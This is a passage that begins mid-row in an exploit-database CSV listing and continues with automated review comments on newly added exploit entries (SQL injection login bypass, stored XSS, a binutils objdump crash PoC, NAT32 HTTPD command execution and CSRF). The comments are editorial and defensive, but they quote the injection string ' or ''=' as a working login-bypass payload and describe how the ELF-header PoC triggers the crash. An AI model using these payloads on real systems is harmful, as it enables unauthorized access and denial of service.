'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
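Review bot: 44036.txt describes the login bypass only as a username/password pair, but the password value `' or ''='` is a SQL-injection string, so the finding is an authentication bypass via SQL injection in adminLogin.php rather than a separate class; the header should say so and name the injected field, the way 44037.txt records `access_login (POST)`. `Version: All version` is also unverifiable as written; record the version actually tested.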
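Review bot: the closing `Username : ... / Password : anything` block of 44037.txt repeats the string already given as `Payload 1` under the Proof of Concept, and the free-text section carries spelling slips (`Discrption`, `sql commands`, inconsistent spacing before full stops). Suggest keeping a single PoC block and fixing the spelling so the entry reads like the other headers in the tree.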
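Review bot: the `Vulnerable code:` section of 44038.txt contains only the fragment `id)?>`, so the PHP snippet was lost on import, and the POST body `bio=&csrf=8b1339546d6af1e7536da0a705302e9c&update_bio=` is 54 bytes against the declared `Content-Length: 59`, so the bio value was stripped as well. Without the snippet the entry never shows where the stored bio is rendered; either restore it from the source or add one sentence stating what steps 3 to 5 imply, that edit_profile.php stores the bio and the profile page echoes it without output encoding.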
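Review bot: the helper C source written by 44035.py cannot compile as shown: its first line is a bare `#include` with no header name (the angle-bracketed `stdio.h` was evidently lost on import), so `gcc -c helloWorld.c -o test` fails and the following `open("test", 'rb+')` raises before objdump is ever run. The patching is also Python 2 only: `f.write("\xff\xff")` writes a str to a binary handle, which Python 3 rejects; bytes literals (`b"\xff\xff"`) or a stated interpreter would fix that. Finally, the two offsets deserve a comment: 0x2c is `e_phnum` in the ELF32 header, and the `readelf -h` line quoted in the file (`Number of program headers: 65535 (536870912)`) shows the second write supplies the extended count, which is what the crash depends on.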
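Review bot: 44033.txt ends without a mitigation, although its own evidence points to one. The netstat line shows the HTTPD bound to `0.0.0.0:8080`, the text states that commands are accepted unauthenticated unless `Password Checking` is enabled, and it then shows that the XSS path works even when it is; a short note should therefore tell defenders that enabling Password Checking is insufficient, that the interface should not be reachable beyond the local host, and that the vendor's fix was to remove the HTTPD code from Build 22284, as the timeline records. Several embedded examples are also empty (the `execr` PoC URL ends at `cmd=` and the HTTP response samples carry no markup), so angle-bracket content was stripped on import, and `NET32 Password Checking` in the Exploit/POC section should read NAT32.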
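Review bot: the `Backdoor clicker` proof of concept in 44034.txt is empty (the HTML was stripped on import), so the entry documents the CSRF by description only. The Security Issue text already states the fact a defender needs, that the HTTPD "performs no check for blind requests", i.e. no anti-CSRF token or origin check on the web interface; a mitigation line restating that alongside the vendor's removal of the HTTPD code would make the entry usable without the PoC. Minor: `Its also worth mentioning is NAT32 implements` should read `It is also worth mentioning that NAT32 implements`.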
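Review bot: in the first files_exploits.csv hunk, the new row `44035,exploits/windows/dos/44035.py,...,dos,windows,` records the platform as windows, but the exploit header says `Tested on: Ubuntu 16.04 32-bit` and the target is GNU binutils objdump driven through gcc and os.system, so the row (and the file's directory) belong under linux or multiple rather than windows. The description `GNU binutils 2.26.1 - Integer Overflow (POC)` also names only the tested version while the header gives `Vuln Version: <2.29.1`; carrying the range into the description would help anyone searching for later 2.2x builds.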
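Review bot: in the second files_exploits.csv hunk, row 44038 is titled `userSpice 4.3 - Cross-Site Scripting` while the advisory header states `userSpice <= 4.3 Persistent Cross Site Scripting`, so the affected range is lost; row 44036's `Authentication Bypass` omits that the bypass is a SQL injection in adminLogin.php, which is the term most searchers will use; and row 44033's `Remote Command Execution` should carry the precondition the file itself states, that unauthenticated command execution requires Password Checking to be disabled and the authenticated path is cross-site scripting.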